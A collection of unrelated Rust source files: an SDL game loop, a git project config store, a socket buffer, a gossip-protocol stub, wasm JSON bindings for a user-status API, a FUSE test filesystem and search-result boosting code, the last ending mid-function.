let sdl_context = sdl2::init().unwrap();
let video = sdl_context.video().unwrap();
let window = video.window("ArcadeRS Shooter", 800, 600)
.position_centered()
.opengl()
.build()
.unwrap();
let mut renderer = window.renderer().accelerated().build().unwrap();
let mut events = Events::new(sdl_context.event_pump().unwrap());
loop {
events.pump();
if events.now.key_escape == Some(true) || events.now.quit {
break;
}
renderer.set_draw_color(Color::RGB(0, 0, 0));
renderer.clear();
renderer.present();
}
}
|
use std::env::current_dir;
use std::error::Error;
use std::fmt::{self, Display, Formatter};
use std::fs::{read_to_string, File};
use std::io::Write;
use git2::Repository;
use serde::{Serialize, Deserialize};
use super::Project;
use crate::PROJECT_FILE_NAME;
#[derive(Debug)]
struct OpenError;
impl Display for OpenError {
fn fmt(&self, f: &mut Formatter) -> fmt::Result {
write!(f, "{} file does not exist. Did you forget to initialize a project in this repository?", PROJECT_FILE_NAME)
}
}
impl Error for OpenError {}
#[derive(Serialize, Deserialize, Clone, Debug)]
pub struct GitProject {
projects: Vec<Project>,
}
impl GitProject {
pub fn new() -> GitProjectBuilder {
GitProjectBuilder::new()
}
pub fn open() -> Result<GitProject, Box<dyn Error>> {
let repository = Repository::discover(current_dir()?)?;
let workdir = repository.workdir().unwrap();
let root = workdir.join(PROJECT_FILE_NAME);
if !root.exists() { return Err(Box::new(OpenError)) }
let string = read_to_string(root)?;
let git_project = toml::from_str(&string)?;
Ok(git_project)
}
pub fn save(&self) -> Result<(), Box<dyn Error>> {
let repository = Repository::discover(current_dir()?)?;
let workdir = repository.workdir().unwrap();
let root = workdir.join(PROJECT_FILE_NAME);
let project_string = toml::to_string_pretty(self)?;
let mut file = File::create(root)?;
write!(file, "{}", project_string)?;
Ok(())
}
pub fn projects(&self) -> &[Project] {
self.projects.as_slice()
}
pub fn projects_mut(&mut self) -> &mut [Project] {
self.projects.as_mut()
}
pub fn add_project(&mut self, project: Project) -> bool {
if self.projects.iter().find(|original| original.name() == project.name()).is_some() { return false; }
self.projects.push(project);
true
}
pub fn replace_project(&mut self, original_name: &str, project: Project) {
if let Some(position) = self.projects.iter().position(|original| original.name() == original_name) {
self.projects[position] = project;
} else {
self.projects.push(project);
}
}
pub fn delete_project(&mut self, index: usize) {
self.projects.remove(index);
}
}
#[derive(Debug)]
pub struct GitProjectBuilder {
projects: Vec<Project>,
}
impl GitProjectBuilder {
fn new() -> Self {
Self { projects: vec![] }
}
pub fn project(mut self, project: Project) -> Self {
self.projects.push(project);
self
}
pub fn build(self) -> Result<GitProject, Self> {
Ok(GitProject {
projects: self.projects
})
}
}
|
use std::io::{Read, Write, Result};
use std::ptr;
use std::fmt;
use std::cmp;
use psocket::{self, TcpSocket};
pub struct Buffer {
val: Vec<u8>,
rpos: usize,
wpos: usize,
}
impl Buffer {
pub fn new() -> Buffer {
Buffer {
val: Vec::new(),
rpos: 0,
wpos: 0,
}
}
pub fn get_data(&self) -> &Vec<u8> {
&self.val
}
pub fn len(&self) -> usize {
self.val.len()
}
pub fn empty(&self) -> bool {
self.val.len() == 0
}
pub fn set_rpos(&mut self, rpos: usize) {
self.rpos = rpos;
}
pub fn get_rpos(&self) -> usize {
self.rpos
}
pub fn set_wpos(&mut self, wpos: usize) {
self.wpos = wpos;
}
pub fn get_wpos(&self) -> usize {
self.wpos
}
pub fn drain(&mut self, pos: usize) {
self.rpos = self.rpos - cmp::min(self.rpos, pos);
self.wpos = self.wpos - cmp::min(self.wpos, pos);
let pos = cmp::min(self.val.len(), pos);
self.val.drain(..pos);
}
pub fn drain_all(&mut self) {
self.rpos = 0;
self.wpos = 0;
self.val.drain(..);
}
pub fn drain_collect(&mut self, pos: usize) -> Vec<u8> {
self.rpos = self.rpos - cmp::min(self.rpos, pos);
self.wpos = self.wpos - cmp::min(self.wpos, pos);
let pos = cmp::min(self.val.len(), pos);
self.val.drain(..pos).collect()
}
pub fn drain_all_collect(&mut self) -> Vec<u8> {
self.rpos = 0;
self.wpos = 0;
self.val.drain(..).collect()
}
pub fn clear(&mut self) {
self.val.clear();
self.rpos = 0;
self.wpos = 0;
}
}
impl fmt::Debug for Buffer {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
write!(fmt, "bytes ({:?})", self.val)
}
}
impl Read for Buffer {
fn read(&mut self, buf: &mut [u8]) -> Result<usize> {
let left = self.val.len() - self.rpos;
if left == 0 || buf.len() == 0 {
return Ok(0);
}
let read = if left > buf.len() { buf.len() } else { left };
unsafe {
ptr::copy(&self.val[self.rpos], &mut buf[0], read);
}
self.rpos += read;
Ok(read)
}
}
impl Write for Buffer {
fn write(&mut self, buf: &[u8]) -> Result<usize> {
if self.val.len() < self.wpos + buf.len() {
self.val.resize(self.wpos + buf.len(), 0);
}
if buf.len() == 0 {
return Ok(buf.len());
}
unsafe {
ptr::copy(&buf[0], &mut self.val[self.wpos], buf.len());
}
self.wpos += buf.len();
Ok(buf.len())
}
fn flush(&mut self) -> Result<()> {
Ok(())
}
}
/// 每个已分配的Socket在事件管理器都会分配一个该对象以维护已读队列,
/// 在写队列, 标记是否正在请求写操作, 是否发生错误, 及Socket变量
#[derive(Debug)]
pub struct EventBuffer {
pub read: Buffer,
pub write: Buffer,
pub socket: TcpSocket,
pub read_cache: Vec<u8>,
pub is_in_write: bool,
pub is_in_read: bool,
pub error: Result<()>,
}
impl EventBuffer {
pub fn new(socket: TcpSocket, capacity: usize) -> EventBuffer {
let capacity = cmp::max(capacity, 1024);
EventBuffer {
read: Buffer::new(),
write: Buffer::new(),
socket: socket,
read_cache: vec![0; capacity],
is_in_write: false,
is_in_read: false,
error: Ok(()),
}
}
pub fn as_raw_socket(&self) -> psocket::SOCKET {
self.socket.as_raw_socket()
}
pub fn has_read_buffer(&self) -> bool {
!self.read.empty()
}
}
|
use bincode;
use crossbeam_channel::Receiver;
use serde::{Deserialize, Serialize};
use std::collections::HashMap;
use std::net::{SocketAddr, ToSocketAddrs, UdpSocket};
#[derive(Debug)]
struct Group {
me: Node,
peers: HashMap<String, Node>,
// ack for specific ping's seq_no.
ack_handlers: HashMap<u32, Receiver<Packet>>,
}
impl Group {
fn members(&self) -> Vec<Node> {
unimplemented!()
}
fn new(me: Node, seed_peers: &[Node]) -> Self {
unimplemented!()
}
fn probe_peers(&self) {
unimplemented!()
}
fn probe(&self, node: &Node) {
unimplemented!()
}
fn packet_listener(&self) -> Result<(), String> {
let mut buf: Vec<u8> = vec![0; 1024];
self.me.sock.recv(&mut buf).unwrap();
let pkt = decode_packet(&buf).unwrap();
match pkt {
Packet::Ping { from, seq_no } => if self.ack_handlers.contains_key(&seq_no) {},
Packet::Ack { from, seq_no } => {}
Packet::PingReq => {}
Packet::IndirectAck => {}
_ => {}
}
Ok(())
}
fn send<T: ToSocketAddrs>(sock: &UdpSocket, msg: Vec<u8>, to: T) -> std::io::Result<usize> {
sock.send_to(&msg, to)
}
fn encode_and_send() {}
}
#[derive(Debug)]
struct Node {
name: String,
seq_no: u64,
incar_no: u64,
addr: SocketAddr,
sock: UdpSocket,
state: NodeState,
}
impl Node {
fn next_seq_no(&self) {
unimplemented!()
}
fn next_incar_no(&self) {
unimplemented!()
}
}
#[derive(Debug)]
enum NodeState {
Alive,
Dead,
Suspect,
}
#[derive(Serialize, Deserialize, Debug, PartialEq)]
enum Packet {
Ping { from: String, seq_no: u32 },
Ack { from: String, seq_no: u32 },
PingReq,
IndirectAck,
Alive,
Joined,
Left,
Failed,
}
fn encode_packet(pkt: &Packet) -> Result<Vec<u8>, String> {
let buf = bincode::serialize(pkt).unwrap();
Ok(buf)
}
fn decode_packet(buf: &[u8]) -> Result<Packet, String> {
let pkt: Packet = bincode::deserialize(buf).unwrap();
Ok(pkt)
}
#[test]
fn test_encode_decode() {
let before = Packet::Ping {
from: "me".to_owned(),
seq_no: 1234,
};
let buf = encode_packet(&before).unwrap();
let after = decode_packet(&buf).unwrap();
assert_eq!(before, after);
}
|
//! Wraps the exposed APIs under a single place.
//!
//! This crate exposes the following APIs:
//!
//! * Builder
//! * JSON
//! * WASM
pub mod builder;
pub mod json;
pub mod wasm;
|
extern crate js_sys;
extern crate serde;
#[macro_use]
extern crate serde_derive;
extern crate serde_json;
extern crate wasm_bindgen;
extern crate wee_alloc;
use std::fmt::Debug;
use serde_json::{from_slice, to_string};
use wasm_bindgen::prelude::*;
#[global_allocator]
static ALLOC: wee_alloc::WeeAlloc = wee_alloc::WeeAlloc::INIT;
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub enum FeatureTypename {
#[serde(rename = "FeatureNode")]
FeatureNode,
}
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub enum FeatureGuideType {
#[serde(rename = "OTHER")]
Other,
#[serde(rename = "QUESTION_DETAIL_TOUR")]
QuestionDetailTour,
}
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub enum NotificationStatusTypename {
#[serde(rename = "NotificationStatus")]
NotificationStatus,
}
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub enum UserStatusTypename {
#[serde(rename = "MeNode")]
MeNode,
}
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub enum Permission {
#[serde(rename = "authentication_ignore_beta_user_flow")]
AuthenticationIgnoreBetaUserFlow,
#[serde(rename = "authentication_see_user_email")]
AuthenticationSeeUserEmail,
#[serde(rename = "authentication_see_user_id")]
AuthenticationSeeUserId,
#[serde(rename = "columns_add_article")]
ColumnsAddArticle,
#[serde(rename = "columns_change_article")]
ColumnsChangeArticle,
#[serde(rename = "columns_delete_article")]
ColumnsDeleteArticle,
#[serde(rename = "columns_pick_article")]
ColumnsPickArticle,
#[serde(rename = "columns_review_article")]
ColumnsReviewArticle,
#[serde(rename = "columns_see_columns")]
ColumnsSeeColumns,
#[serde(rename = "contest_private_access_dashboard")]
ContestPrivateAccessDashboard,
#[serde(rename = "contest_see_private")]
ContestSeePrivate,
#[serde(rename = "discuss_change_contest_post")]
DiscussChangeContestPost,
#[serde(rename = "discuss_change_post")]
DiscussChangePost,
#[serde(rename = "discuss_delete_contest_post")]
DiscussDeleteContestPost,
#[serde(rename = "discuss_delete_post")]
DiscussDeletePost,
#[serde(rename = "discuss_pin_contest_topic")]
DiscussPinContestTopic,
#[serde(rename = "discuss_pin_topic")]
DiscussPinTopic,
#[serde(rename = "discuss_review_contest_post")]
DiscussReviewContestPost,
#[serde(rename = "discuss_review_post")]
DiscussReviewPost,
#[serde(rename = "discuss_see_contest_hiden_post")]
DiscussSeeContestHidenPost,
#[serde(rename = "discuss_see_hiden_post")]
DiscussSeeHidenPost,
#[serde(rename = "library_change_question")]
LibraryChangeQuestion,
#[serde(rename = "library_see_all_fields")]
LibrarySeeAllFields,
#[serde(rename = "library_see_all_problems")]
LibrarySeeAllProblems,
}
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub struct Response {
data: GlobalResp,
}
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub struct UserStatus {
#[serde(rename = "__typename")]
typename: UserStatusTypename,
#[serde(rename = "activeSessionId")]
active_session_id: String,
#[serde(rename = "avatar")]
avatar: String,
#[serde(rename = "checkedInToday")]
pub checked_in_today: bool,
#[serde(rename = "completedFeatureGuides")]
completed_feature_guides: Vec<FeatureGuideType>,
#[serde(rename = "isAdmin")]
pub is_admin: bool,
#[serde(rename = "isPremium")]
pub is_premium: bool,
#[serde(rename = "isSignedIn")]
pub is_signed_in: bool,
#[serde(rename = "isStaff")]
pub is_staff: bool,
#[serde(rename = "isSuperuser")]
pub is_superuser: bool,
#[serde(rename = "isTranslator")]
pub is_translator: bool,
#[serde(rename = "isVerified")]
pub is_verified: bool,
#[serde(rename = "notificationStatus")]
notification_status: FluffyNotificationStatus,
#[serde(rename = "optedIn")]
pub opted_in: bool,
#[serde(rename = "permissions")]
permissions: Vec<Permission>,
#[serde(rename = "realName")]
real_name: String,
#[serde(rename = "region")]
region: String,
#[serde(rename = "requestRegion")]
request_region: String,
#[serde(rename = "username")]
username: String,
#[serde(rename = "userSlug")]
user_slug: String,
}
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub struct FluffyNotificationStatus {
#[serde(rename = "__typename")]
typename: NotificationStatusTypename,
#[serde(rename = "lastModified")]
last_modified: String,
#[serde(rename = "numUnread")]
pub num_unread: f64,
}
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub struct GlobalResp {
#[serde(rename = "userStatus")]
user_status: UserStatus,
feature: Feature,
}
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub struct Feature {
#[serde(rename = "__typename")]
typename: FeatureTypename,
#[serde(rename = "book")]
pub book: bool,
#[serde(rename = "chinaProblemDiscuss")]
pub china_problem_discuss: bool,
#[serde(rename = "cnJobs")]
pub cn_jobs: bool,
#[serde(rename = "contest")]
pub contest: bool,
#[serde(rename = "discuss")]
pub discuss: bool,
#[serde(rename = "mockInterview")]
pub mock_interview: bool,
#[serde(rename = "questionTranslation")]
pub question_translation: bool,
#[serde(rename = "signUp")]
pub sign_up: bool,
#[serde(rename = "socialProviders")]
social_providers: String,
#[serde(rename = "store")]
pub store: bool,
#[serde(rename = "studentFooter")]
pub student_footer: bool,
#[serde(rename = "subscription")]
pub subscription: bool,
}
#[inline]
fn unwrap_abort<T>(o: Option<T>) -> T {
use std::process;
match o {
Some(t) => t,
None => process::abort(),
}
}
#[inline]
fn unwrap_result_abort<T, E: Debug>(o: Result<T, E>) -> T {
use std::process;
match o {
Ok(t) => t,
Err(_e) => process::abort(),
}
}
#[wasm_bindgen]
pub fn parse(v: Box<[u8]>) -> Response {
unwrap_result_abort(from_slice(v.as_ref()))
}
#[wasm_bindgen]
pub fn stringify(v: &Response) -> String {
unwrap_result_abort(to_string(v))
}
|
use std::str::FromStr;
use structopt::StructOpt;
use std::io;
use std::env;
use std::process::Command;
use log::*;
use std::thread::sleep;
use std::time::Duration;
use std::fs::File;
use std::os::raw::c_int;
use std::path::Path;
use std::sync::Arc;
use flexi_logger::{colored_opt_format, Logger};
use std::os::unix::io::{RawFd, FromRawFd, AsRawFd};
use rofuse::MountOption;
use rofuse::{channel::Channel, mnt::Mount, Session};
fn main() {
let opt: Options = Options::from_args();
Logger::try_with_env_or_str("trace")
.unwrap()
.format(colored_opt_format)
.start().unwrap();
log::set_max_level(LevelFilter::Trace);
debug!("{:?}", opt);
match opt.role {
Role::Master => master(opt),
Role::Worker => worker(opt),
}.unwrap()
}
fn master(mut opt: Options) -> io::Result<()> {
let options = vec![
MountOption::RO,
MountOption::FSName("rofs".to_string()),
MountOption::Subtype("FUSE".to_string()),
MountOption::Async,
MountOption::DirSync,
MountOption::AutoUnmount,
];
let (file, mount): (Arc<File>, Mount) = Mount::new((&opt.mountpoint).as_ref(), &options)?;
let fd = file.as_ref().as_raw_fd() as i32;
let mut child_opt = opt.clone();
child_opt.role = Role::Worker;
child_opt.session = fd;
let current_dir = env::current_dir().unwrap().to_str().unwrap().to_string();
let current_cmd = env::args().nth(0).unwrap();
info!("{}/{}", current_dir, current_cmd);
loop {
let mut cmd = Command::new(format!("{}/{}", current_dir, current_cmd));
cmd.args(child_opt.to_args());
let mut res = cmd.spawn().expect("worker failed");
match res.wait() {
Ok(s) => println!("{}", s),
Err(e) => println!("{}", e),
}
}
}
fn worker(opt: Options) -> io::Result<()> {
unsafe {
let res = libc::ioctl(opt.session as c_int, (2 << 30) | (4 << 16) | (230 << 8) as u64, 0);
info!("ioctl {} {} {}", opt.session as c_int, (2 << 30) | (4 << 16) | (230 << 8) as u64, 0);
info!("res {}", res);
};
let zerofs = unsafe{mufs::zero("file".to_string())?};
let file = unsafe {File::from_raw_fd(opt.session as RawFd)};
let ch = Channel::new(Arc::new(file));
Session::restore(zerofs, opt.mountpoint.parse().unwrap(), ch).run();
return Ok(())
}
#[derive(StructOpt, Debug, Clone)]
#[structopt(
name = format!("test"),
)]
pub struct Options {
#[structopt(
short = "r",
long = "role",
required = true,
help = "role of master/worker",
default_value = "single"
)]
pub role: Role,
#[structopt(
short = "s",
long = "session-fd",
required = false,
help = "fd of fuse session",
default_value = "-1"
)]
pub session: i32,
#[structopt(
short = "p",
long = "mountpoint",
required = true,
help = "mount point",
)]
pub mountpoint: String,
}
impl Options {
fn to_args(&self) -> Vec<String> {
let mut args: Vec<String> = vec![];
args.push("--role".to_string());
args.push(self.role.to_string());
args.push("--session-fd".to_string());
args.push(format!("{}", self.session));
args.push("--mountpoint".to_string());
args.push( self.mountpoint.to_string());
args
}
}
#[derive(Debug, PartialEq, Eq, Copy, Clone)]
pub enum Role {
Master,
Worker,
}
impl FromStr for Role {
type Err = String;
fn from_str(role: &str) -> Result<Role, Self::Err> {
match role {
"master" => Ok(Role::Master),
"worker" => Ok(Role::Worker),
_ => Err(format!("bad role {}", role))
}
}
}
impl ToString for Role {
fn to_string(&self) -> String {
match self {
Role::Master => "master",
Role::Worker => "worker",
}.parse().unwrap()
}
}
pub mod mufs {
use std::cmp::{max, min};
use clap::{crate_version, App, Arg};
use rofuse::{
FileAttr, FileType, Filesystem, MountOption, ReplyAttr, ReplyData, ReplyDirectory, ReplyEntry,
Request,
};
use memmap::{Mmap, MmapOptions};
use libc::ENOENT;
use std::ffi::OsStr;
use std::time::{Duration, UNIX_EPOCH};
use std::io::{Result, Error, Read, Seek};
use std::fs::File;
use std::os::unix::fs::FileExt;
const MAX: i32 = 4 * 1024 *1024;
const TTL: Duration = Duration::from_secs(1); // 1 second
const HELLO_TXT_CONTENT: &str = "Hello World!\n";
const FAST_CONTENT: &str = "fast\n";
const SLOW_CONTENT: &str = "slow\n";
static ATTRS: [FileAttr; 4] = [
FileAttr {
ino: 1,
size: 0,
blocks: 0,
atime: UNIX_EPOCH, // 1970-01-01 00:00:00
mtime: UNIX_EPOCH,
ctime: UNIX_EPOCH,
crtime: UNIX_EPOCH,
kind: FileType::Directory,
perm: 0o755,
nlink: 2,
uid: 501,
gid: 20,
rdev: 0,
flags: 0,
blksize: 512,
}, FileAttr {
ino: 2,
size: 13,
blocks: 1,
atime: UNIX_EPOCH, // 1970-01-01 00:00:00
mtime: UNIX_EPOCH,
ctime: UNIX_EPOCH,
crtime: UNIX_EPOCH,
kind: FileType::RegularFile,
perm: 0o644,
nlink: 1,
uid: 501,
gid: 20,
rdev: 0,
flags: 0,
blksize: 512,
}, FileAttr {
ino: 3,
size: 5,
blocks: 1,
atime: UNIX_EPOCH, // 1970-01-01 00:00:00
mtime: UNIX_EPOCH,
ctime: UNIX_EPOCH,
crtime: UNIX_EPOCH,
kind: FileType::RegularFile,
perm: 0o644,
nlink: 1,
uid: 501,
gid: 20,
rdev: 0,
flags: 0,
blksize: 512,
}, FileAttr {
ino: 4,
size: 5,
blocks: 1,
atime: UNIX_EPOCH, // 1970-01-01 00:00:00
mtime: UNIX_EPOCH,
ctime: UNIX_EPOCH,
crtime: UNIX_EPOCH,
kind: FileType::RegularFile,
perm: 0o644,
nlink: 1,
uid: 501,
gid: 20,
rdev: 0,
flags: 0,
blksize: 512,
}
];
pub struct Zero {
attrs: Vec<FileAttr>,
}
pub unsafe fn zero(name: String) -> Result<Zero> {
let mut attrs = Vec::from(ATTRS);
return Ok(Zero{
attrs: attrs,
})
}
impl Filesystem for Zero {
fn lookup(&mut self, _req: &Request, parent: u64, name: &OsStr, reply: ReplyEntry) {
if parent == 1 {
match name.to_str().unwrap() {
"hello.txt" => reply.entry(&TTL, &self.attrs[1], 0),
"fast.txt" => reply.entry(&TTL, &self.attrs[2], 0),
"slow.txt" => reply.entry(&TTL, &self.attrs[3], 0),
_ => {reply.error(ENOENT)}
}
} else {
reply.error(ENOENT);
}
}
fn getattr(&mut self, _req: &Request, ino: u64, reply: ReplyAttr) {
match ino {
1 | 2 | 3 | 4 => reply.attr(&TTL, &self.attrs[(ino - 1) as usize]),
_ => reply.error(ENOENT),
}
}
fn readdir(
&mut self,
_req: &Request,
ino: u64,
_fh: u64,
offset: i64,
mut reply: ReplyDirectory,
) {
match ino {
1 => {
vec![
(1, FileType::Directory, "."),
(1, FileType::Directory, ".."),
(2, FileType::RegularFile, "hello.txt"),
(3, FileType::RegularFile, "fast.txt"),
(4, FileType::RegularFile, "slow.txt"),
]
.iter()
.enumerate()
.skip(offset as usize)
.all(|(index, entry)| reply.add(entry.0, (index + 1) as i64, entry.1, entry.2));
reply.ok();
}
_ => reply.error(ENOENT),
}
}
fn read(
&mut self,
_req: &Request,
ino: u64,
_fh: u64,
offset: i64,
_size: u32,
_flags: i32,
_lock: Option<u64>,
reply: ReplyData,
) {
match ino {
2 => reply.data(&HELLO_TXT_CONTENT.as_bytes()[offset as usize..]),
3 => {std::thread::sleep(Duration::from_secs(1)); reply.data(&FAST_CONTENT.as_bytes()[offset as usize..])},
4 => {std::thread::sleep(Duration::from_secs(10)); reply.data(&SLOW_CONTENT.as_bytes()[offset as usize..])},
_ => reply.error(ENOENT),
}
}
}
}
|
use super::*;
use crate::{search::request::*, steps::FieldPath};
pub use self::result::*;
use std::{self, f32};
use fnv::FnvHashMap;
use itertools::Itertools;
#[inline]
pub(crate) fn boost_text_locality_all(persistence: &Persistence, term_id_hits_in_field: &mut FnvHashMap<String, FnvHashMap<String, Vec<TermId>>>) -> Result<Vec<Hit>, VelociError> {
debug!("boost_text_locality_all {:?}", term_id_hits_in_field);
info_time!("boost_text_locality_all");
let mut boost_anchor: Vec<Hit> = vec![];
let r: Result<Vec<_>, VelociError> = term_id_hits_in_field
.into_par_iter()
.map(|(path, term_with_ids)| boost_text_locality(persistence, path, term_with_ids))
.collect();
info_time!("collect sort_boost");
let boosts = r?;
let mergo = boosts.into_iter().kmerge_by(|a, b| a.id < b.id);
for (id, group) in &mergo.group_by(|el| el.id) {
let best_score = group.map(|el| el.score).max_by(|a, b| b.partial_cmp(a).unwrap_or(Ordering::Equal)).unwrap();
debug_assert!(!best_score.is_nan());
debug_assert!(best_score != std::f32::INFINITY);
boost_anchor.push(Hit::new(id, best_score));
}
trace!("{:?}", boost_anchor);
Ok(boost_anchor)
}
pub(crate) fn boost_text_locality(persistence: &Persistence, path: &str, search_term_to_text_ids: &mut FnvHashMap<String, Vec<TermId>>) -> Result<Vec<Hit>, VelociError> {
let mut boost_anchor = vec![];
if search_term_to_text_ids.len() <= 1 {
// No boost for single term hits
return Ok(vec![]);
}
let token_to_text_id = persistence.get_valueid_to_parent(path.add(TOKENS_TO_TEXT_ID))?;
let mut terms_text_ids: Vec<_> = vec![];
let mut boost_text_ids = vec![];
{
trace_time!("text_locality_boost get and group text_ids");
for text_ids in search_term_to_text_ids.values() {
let mut text_ids = get_all_value_ids(text_ids, token_to_text_id);
text_ids.sort_unstable();
terms_text_ids.push(text_ids);
}
let mergo = terms_text_ids.into_iter().kmerge_by(|a, b| a < b);
for (id, group) in &mergo.group_by(|el| *el) {
let num_hits_in_same_text = group.count();
if num_hits_in_same_text > 1 {
boost_text_ids.push((id, num_hits_in_same_text));
}
}
}
// text_ids are already anchor_ids === identity_column
if persistence
.metadata
.columns
.get(&extract_field_name(path))
.map(|el| el.is_anchor_identity_column)
.unwrap_or(false)
{
boost_text_ids.sort_unstable_by_key(|el| el.0);
for text_id in boost_text_ids {
let num_hits_in_same_text = text_id.1;
boost_anchor.push(Hit::new(text_id.0, 2. * num_hits_in_same_text as f32 * num_hits_in_same_text as f32));
}
} else {
let text_id_to_anchor = persistence.get_valueid_to_parent(path.add(TEXT_ID_TO_ANCHOR))?;
trace_time!("text_locality_boost text_ids to anchor");
boost_text_ids.sort_unstable_by_key(|el| el.0);
for text_id in boost_text_ids {
let num_hits_in_same_text = text_id.1;
for anchor_id in text_id_to_anchor.get_values_iter(u64::from(text_id.0)) {
boost_anchor.push(Hit::new(anchor_id, 2. * num_hits_in_same_text as f32 * num_hits_in_same_text as f32));
}
}
}
boost_anchor.sort_unstable_by_key(|el| el.id);
Ok(boost_anchor)
}
pub(crate) fn apply_boost_term(persistence: &Persistence, mut res: SearchFieldResult, boost_term: &[RequestSearchPart]) -> Result<SearchFieldResult, VelociError> {
info_time!("boost_term");
{
persistence.term_boost_cache.write().get(boost_term); //poke
}
let mut from_cache = false;
// Attentión - The read lock is still active in the else block therefore we need to create an extra scope to avoid deadlocks
// This should be probably fixed sometime with better lifetime handling in rust
{
if let Some(data) = persistence.term_boost_cache.read().peek(boost_term) {
// let mut boost_iter = data.hits_ids.iter().map(|el|el.clone());
// res = apply_boost_from_iter(res, &mut boost_iter)
info_time!("boost_term_from_cache");
let mut boost_iter = data
.iter()
.map(|el| {
let boost_val: f32 = el.request.boost.map(|el| el.into_inner()).unwrap_or(2.0);
debug_assert!(!boost_val.is_nan());
debug_assert!(boost_val != std::f32::INFINITY);
el.hits_ids.iter().map(move |id| Hit::new(*id, boost_val))
})
.kmerge_by(|a, b| a.id < b.id);
// {
// let mut boost_iter_data:Vec<Hit> = data.iter()
// .map(|el| {
// let boost_val:f32 = el.request.boost.unwrap_or(2.0).clone();
// el.hits_ids.iter().map(move|id| Hit::new(*id, boost_val ))
// })
// .into_iter().kmerge_by(|a, b| a.id < b.id).collect();
// {
// let mut direct_data:Vec<f32> = vec![];
// for hit in boost_iter_data.iter() {
// if direct_data.len() <= hit.id as usize {
// direct_data.resize(hit.id as usize + 1, 0.0);
// }
// direct_data[hit.id as usize] = hit.score;
// }
// info_time!("direct search boost");
// for hit in res.hits_scores.iter_mut(){
// if let Some(boost_hit) = direct_data.get(hit.id as usize) {
// hit.score *= boost_hit;
// }
// }
// }
// {
// let my_boost = 2.0;
// let mut direct_data:FixedBitSet = {
// let mut ay = FixedBitSet::with_capacity(70000 as usize + 1);
// for hit in boost_iter_data.iter() {
// let (_, id_in_bucket) = to_bucket_and_id(hit.id);
// ay.insert(id_in_bucket as usize);
// }
// ay
// };
// info_time!("direct search bitset");
// for hit in res.hits_scores.iter_mut(){
// let (_, id_in_bucket) = to_bucket_and_id(hit.id);
// if direct_data.contains(id_in_bucket as usize) {
// hit.score *= my_boost;
// }
// }
// }
// {
// info_time!("merge search boost");
// res = apply_boost_from_iter(res, &mut boost_iter_data.into_iter());
// }
// debug_time!("binary search".to_string());
// }
debug_time!("boost_hits_ids_vec_multi");
res = apply_boost_from_iter(res, &mut boost_iter);
from_cache = true;
}
}
if !from_cache {
let r: Result<Vec<_>, VelociError> = boost_term
.to_vec()
.into_par_iter()
.map(|boost_term_req: RequestSearchPart| {
let mut boost_term_req = PlanRequestSearchPart {
request: boost_term_req,
get_ids: true,
..Default::default()
};
let mut result = search_field::get_term_ids_in_field(persistence, &mut boost_term_req)?;
result = search_field::resolve_token_to_anchor(persistence, &boost_term_req.request, &None, &result)?;
Ok(result)
})
.collect();
let mut data = r?;
res = boost_hits_ids_vec_multi(res, &mut data);
{
persistence.term_boost_cache.write().insert(boost_term.to_vec(), data);
}
}
Ok(res)
}
pub(crate) fn apply_boost_from_iter(mut results: SearchFieldResult, mut boost_iter: &mut dyn Iterator<Item = Hit>) -> SearchFieldResult {
let mut explain = FnvHashMap::default();
mem::swap(&mut explain, &mut results.explain);
let should_explain = results.request.is_explain();
{
let mut move_boost = |hit: &mut Hit, hit_curr: &mut Hit, boost_iter: &mut dyn Iterator<Item = Hit>| {
//Forward the boost iterator and look for matches
for b_hit in boost_iter {
if b_hit.id > hit.id {
*hit_curr = b_hit;
break;
} else if b_hit.id == hit.id {
*hit_curr = b_hit.clone();
hit.score *= b_hit.score;
debug_assert!(!hit.score.is_nan());
debug_assert!(hit.score != std::f32::INFINITY);
if should_explain {
let data = explain.entry(hit.id).or_insert_with(Vec::new);
// data.push(format!("boost {:?}", b_hit.score));
data.push(Explain::Boost(b_hit.score));
}
}
}
};
if let Some(yep) = boost_iter.next() {
let mut hit_curr = yep;
for mut hit in &mut results.hits_scores {
if hit_curr.id < hit.id {
move_boost(hit, &mut hit_curr, &mut boost_iter);
} else if hit_curr.id == hit.id {
hit.score *= hit_curr.score;
move_boost(hit, &mut hit_curr, &mut boost_iter); // Possible multi boosts [id:0->2, id:0->4 ...]
}
}
}
}
mem::swap(&mut explain, &mut results.explain);
results
}
#[test]
fn test_apply_boost_from_iter() {
let boost_req = RequestBoostPart {
boost_fun: Some(BoostFunction::Multiply),
..Default::default()
};
let mut res = SearchFieldResult::default();
res.hits_scores = vec![Hit::new(1, 10.0), Hit::new(3, 20.0), Hit::new(5, 20.0)];
let mut boost_values = SearchFieldResult::default();
boost_values.boost_ids = vec![Hit::new(1, 2.0), Hit::new(2, 20.0), Hit::new(5, 3.0), Hit::new(6, 3.0)];
apply_boost_values_anchor(&mut res, &boost_req, &mut boost_values.boost_ids.into_iter()).unwrap();
assert_eq!(res.hits_scores, vec![Hit::new(1, 20.0), Hit::new(3, 20.0), Hit::new(5, 60.0)]);
}
pub(crate) fn apply_boost_values_anchor(results: &mut SearchFieldResult, boost: &RequestBoostPart, mut boost_iter: &mut dyn Iterator<Item = Hit>) -> Result<(), VelociError> {
let boost_param = boost.param.map(|el| el.into_inner()).unwrap_or(0.0);
let expre = boost.expression.as_ref().map(|expression| ScoreExpression::new(expression.clone()));
let mut explain = if results.request.is_explain() { Some(&mut results.explain) } else { None };
{
if let Some(yep) = boost_iter.next() {
let mut hit_curr = yep;
for hit in &mut results.hits_scores {
if hit_curr.id < hit.id {
for b_hit in &mut boost_iter {
if b_hit.id > hit.id {
hit_curr = b_hit.clone();
break;
} else if b_hit.id == hit.id {
hit_curr = b_hit.clone();
apply_boost(hit, b_hit.score, boost_param, &boost.boost_fun, &mut explain, &expre)?;
}
}
} else if hit_curr.id == hit.id {
apply_boost(hit, hit_curr.score, boost_param, &boost.boost_fun, &mut explain, &expre)?;
}
}
}
}
Ok(())
}
pub(crate) fn apply_boost(
hit: &mut Hit,
boost_value: f32,
boost_param: f32,
